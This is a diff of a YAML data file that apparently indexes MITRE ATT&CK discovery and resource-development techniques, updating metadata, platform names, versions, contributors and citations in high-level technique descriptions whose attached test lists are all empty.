-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -51290,10 +51977,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51302,15 +51991,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -51338,9 +52028,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -51415,7 +52102,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -51487,7 +52173,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -51536,12 +52221,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51562,12 +52246,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51592,7 +52275,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51647,7 +52329,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -51667,7 +52349,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -51770,13 +52451,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51787,7 +52467,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51858,29 +52538,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -51904,15 +52583,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -51944,17 +52626,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52007,11 +52688,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52047,7 +52727,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -52096,43 +52776,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -52145,18 +52794,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -52178,7 +52858,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52194,8 +52874,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -52217,7 +52895,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52237,8 +52915,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -52277,7 +52953,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52298,8 +52974,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -52329,7 +53003,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -52366,8 +53040,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -52389,7 +53061,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52411,8 +53083,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -52449,7 +53119,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -52471,8 +53141,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -52534,7 +53202,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52556,7 +53223,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52574,8 +53241,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52610,7 +53275,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52629,33 +53294,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -52665,10 +53328,19 @@ resource-development:
